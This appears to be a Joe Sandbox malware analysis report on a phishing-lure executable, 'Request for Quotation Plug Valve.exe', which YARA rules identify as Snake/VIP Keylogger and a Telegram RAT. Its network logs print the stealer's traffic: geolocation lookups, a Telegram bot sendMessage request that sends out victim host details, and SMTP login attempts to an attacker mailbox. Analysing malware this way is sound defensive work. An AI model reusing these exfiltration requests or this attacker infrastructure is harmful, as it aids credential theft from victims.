2024-10-08 13:10:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49803	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 13:10:28 UTC	674	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59360 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNGt1JyywOMAxqOpFlQTYh4R5RTBRl5S9VVU7aciujlsS7rl6lsi3z75dnamRfkeEW%2Fdiheh51RtFESjPpxDRwiMEAulg8g3ZwMpyKPUjPzCY7tkS%2F2DO0PQmow0DpZni5pEUzo5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65f0e1b4842a0-EWR
2024-10-08 13:10:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49812	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:29 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 13:10:29 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59361 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mIcbmUZIqNBo2cy9AA1gg8Krs7Zeey3rnGUWpNqIjTp0B90CuTyGOhA%2FiDSl4yumKcfc%2FMhcyLWjWrKlgjoV7hLQCLvTeK9E7TaDivOfjfoU7E%2F266T01m5ZbtjcMbLxGOgX7Btz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65f152a644369-EWR
2024-10-08 13:10:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49821	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 13:10:31 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59363 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RK7ydBaYni0sFhCZB6L39kudUI92FWjkVdhoeKpu%2BTa39Tb1%2Bi88ksYHeklZR221EgCvK7An0XwbK9y0ym4%2FIGX6j6ECKXpgd7RzeJZocALSVBP84LTaPSy9I0wz7Vr%2B%2Fw6MEFuS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65f1bd9c641e6-EWR
2024-10-08 13:10:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49831	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:32 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 13:10:32 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59364 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rp2m9F6dQfd%2BOD8cgqYgf1n9PbhOtQTv7rAbwH%2FkhQ2w1FlR7cfK2MLYn4qK4oXW%2FVFReqF1XhpaP%2F1UFRagMjBH2j7Bfr179eeHt955LtMqv3hRkXtNiOiVkwsQ7VbbQdXMfA4a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65f229f8442e8-EWR
2024-10-08 13:10:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49838	149.154.167.220	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:32 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20and%20Time:%2008/10/2024%20/%2023:13:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20688098%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-08 13:10:33 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 08 Oct 2024 13:10:33 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-08 13:10:33 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 8, 2024 15:10:39.161602974 CEST	587	49875	208.91.199.223	192.168.2.6	220 us2.outbound.mailhostbox.com ESMTP Postfix
Oct 8, 2024 15:10:39.162200928 CEST	49875	587	192.168.2.6	208.91.199.223	EHLO 688098
Oct 8, 2024 15:10:39.316873074 CEST	587	49875	208.91.199.223	192.168.2.6	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Oct 8, 2024 15:10:39.318073988 CEST	49875	587	192.168.2.6	208.91.199.223	AUTH login Y2FzaGlzb2tAcG9vb25naGFuYmQuY29t
Oct 8, 2024 15:10:39.475977898 CEST	587	49875	208.91.199.223	192.168.2.6	334 UGFzc3dvcmQ6
Oct 8, 2024 15:10:39.638111115 CEST	587	49875	208.91.199.223	192.168.2.6	235 2.7.0 Authentication successful
Oct 8, 2024 15:10:39.638370991 CEST	49875	587	192.168.2.6	208.91.199.223	MAIL FROM:<cashisok@pooonghanbd.com>
Oct 8, 2024 15:10:39.795197964 CEST	587	49875	208.91.199.223	192.168.2.6	250 2.1.0 Ok
Oct 8, 2024 15:10:39.795408010 CEST	49875	587	192.168.2.6	208.91.199.223	RCPT TO:<cashisok@pooonghanbd.com>
Oct 8, 2024 15:10:39.982266903 CEST	587	49875	208.91.199.223	192.168.2.6	550 5.4.6 <cashisok@pooonghanbd.com>: Recipient address rejected: Email Sending Quota Exceeded

Target ID:	1
Start time:	09:10:15
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"
Imagebase:	0x440000
File size:	776'704 bytes
MD5 hash:	FA1C425A44A073CEC7F36210A6D7C3E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:10:16
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"
Imagebase:	0x870000
File size:	776'704 bytes
MD5 hash:	FA1C425A44A073CEC7F36210A6D7C3E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	27
Total number of Limit Nodes:	2

Executed Functions

Function 00E844E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E859B9

Memory Dump Source

Source File: 00000001.00000002.2249126947.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e80000_Request for Quotation Plug Valve.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ae843f4731ad00746a5bb5e2f712ce6394aa858dee913e6dcc2cecfe7d19ce1b
Instruction ID: ff1981bc178f1ba6ace5cfbeb614b23cfd8f6376a4cf69f05d083ca2455677d7
Opcode Fuzzy Hash: ae843f4731ad00746a5bb5e2f712ce6394aa858dee913e6dcc2cecfe7d19ce1b
Instruction Fuzzy Hash: 1F41E271C0071DCBEB24DFA9C984B8DBBB5BF89304F20815AD418BB291DB756945CF90

Function 00E85903 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E859B9

Memory Dump Source

Source File: 00000001.00000002.2249126947.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e80000_Request for Quotation Plug Valve.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ba7852aa0a1adc246b94767c69d96d7a629941aa3b4c1c7e2e695822b7206958
Instruction ID: e643772ef8f7a2b90c1ca797cc8a8d3a3e7fe390709bccec6693ec4f26913a2c
Opcode Fuzzy Hash: ba7852aa0a1adc246b94767c69d96d7a629941aa3b4c1c7e2e695822b7206958
Instruction Fuzzy Hash: E241D1B1C00719CBEB24DFA9C98478DBBB6BF49304F20815AD418BB291DB756949CF50

Function 00E8D8E0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E8E1E6,?,?,?,?,?), ref: 00E8E2A7

Memory Dump Source

Source File: 00000001.00000002.2249126947.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e80000_Request for Quotation Plug Valve.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3ffba60243196d5b7d79726df133f0270fb4e0c83368d556222b47b411cbdfdf
Instruction ID: 548295e92ac9fe3d4ffe3ef7efd6c7ca9d01e381019be508351ebffc9c189ae2
Opcode Fuzzy Hash: 3ffba60243196d5b7d79726df133f0270fb4e0c83368d556222b47b411cbdfdf
Instruction Fuzzy Hash: D321D2B5900249DFDB10CFAAD984ADEBBF8EB48320F14841AE918B3350D374A954CFA4

Function 00E8BF40 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E8BFA6

Memory Dump Source

Source File: 00000001.00000002.2249126947.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e80000_Request for Quotation Plug Valve.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5d08a0c99ac0cd80668695c613e76ac8ab29d01b80e8c2149a1a44f17681da3d
Instruction ID: d5b7e6fe9724e7dc08fde98c8fd2255b3bd6ebf6ca190594d96c3730813dc5cc
Opcode Fuzzy Hash: 5d08a0c99ac0cd80668695c613e76ac8ab29d01b80e8c2149a1a44f17681da3d
Instruction Fuzzy Hash: 6D110FB6D002498FCB10DF9AC844ADEFBF4AB88324F10841AD918B7250D3B9A945CFA1

Function 07653C62 Relevance: 1.3, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,076545E9,?,?), ref: 07654790

Memory Dump Source

Source File: 00000001.00000002.2253885629.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7650000_Request for Quotation Plug Valve.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8a0f85cedfc6a115bdd2609ba5be2678053332e4f0e0986960197c4d9dd1b6c3
Instruction ID: bcbfcdea5bc62e4e27945e83ad5fbf5501eeafcfdb5c1e0fe4a5116a01a29326
Opcode Fuzzy Hash: 8a0f85cedfc6a115bdd2609ba5be2678053332e4f0e0986960197c4d9dd1b6c3
Instruction Fuzzy Hash: EE2198B18043499FCB10CF99C480BDEBFF4EF09220F20889ADA58E7251D735A544CBA9

Function 07653C84 Relevance: 1.3, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,076545E9,?,?), ref: 07654790

Memory Dump Source

Source File: 00000001.00000002.2253885629.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7650000_Request for Quotation Plug Valve.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b8b2468fc68c937139f4aaf1006204ba8e8d01c7a99e45ca1ea9d714b3924d4b
Instruction ID: 0ff1074cd381801dcc201b4f1472caee5513f54ed9bedd3cb1957fb42abf0090
Opcode Fuzzy Hash: b8b2468fc68c937139f4aaf1006204ba8e8d01c7a99e45ca1ea9d714b3924d4b
Instruction Fuzzy Hash: C91113B58002498FDB10DF9AC484BDEBBF4EB49320F108459D959A7340D779A944CBA5

Function 07654730 Relevance: 1.3, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,076545E9,?,?), ref: 07654790

Memory Dump Source

Source File: 00000001.00000002.2253885629.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7650000_Request for Quotation Plug Valve.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 446c5f9792427cde2b37d49ec94a8506ecefd8186166f6d5bc4804f3b68203fe
Instruction ID: c12e64ef1ffd39776b6fb410bc8837141aab64b4f49d4fb5802e80455af2c37d
Opcode Fuzzy Hash: 446c5f9792427cde2b37d49ec94a8506ecefd8186166f6d5bc4804f3b68203fe
Instruction Fuzzy Hash: 781113B5800249DFDB10DF9AC485BEEBBF8EF48320F10846AD958A7240D779A544CFA5

Function 00A3D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4779e0c667739d898cae1f4a6217de303c08128388cf29b51cf08934dfb4523
Instruction ID: 9d55c9f04eef539f8e0a53283d26869b82e6b38e7eb3aa26c5ddc77074e51281
Opcode Fuzzy Hash: e4779e0c667739d898cae1f4a6217de303c08128388cf29b51cf08934dfb4523
Instruction Fuzzy Hash: 4621F572504244EFDB15DF14E9C0B26BF65FB88318F24C56DF9090B256C336D856CAA1

Function 00A3D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60afce6a7c9ff07caba0320496fa4bf8c0db8536a43db258594377eac54dd39
Instruction ID: ee2b08a9da209e4e1fd359d3fcad769a8765c3c322365d4d7866594a2d4b708c
Opcode Fuzzy Hash: c60afce6a7c9ff07caba0320496fa4bf8c0db8536a43db258594377eac54dd39
Instruction Fuzzy Hash: 072125B6504204EFDB05DF14E9C0B26BF65FB98324F20C56DE90A0B256C336E856CBA2

Function 00A4D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247610189.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a4d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c6a8b857b2cad98b85925901b56fb3287bb4b58464dc698f3d503b8897d282
Instruction ID: b6e125f64de87217ab1394b97772744c1689639bdbd0eb5d5b129b2f0f3539a7
Opcode Fuzzy Hash: 83c6a8b857b2cad98b85925901b56fb3287bb4b58464dc698f3d503b8897d282
Instruction Fuzzy Hash: 042126B9604304EFDB05DF14D9C0B66BBA5FBC4314F20C66DE9094B392C7B6D846CA61

Function 00A4D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247610189.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a4d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd4ad09f1468819c184b225ec7aae46eb603e35bf6ff2652c22be2249bf1c675
Instruction ID: 0c1b78d2563ced909b95f9bd184c57e21c8c1883c657dafc56760d394759b568
Opcode Fuzzy Hash: bd4ad09f1468819c184b225ec7aae46eb603e35bf6ff2652c22be2249bf1c675
Instruction Fuzzy Hash: AF212F79604200EFCB14DF24D9C0B26BBA1FBC8314F20C5ADE90A0B296C37AD807CA61

Function 00A3D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
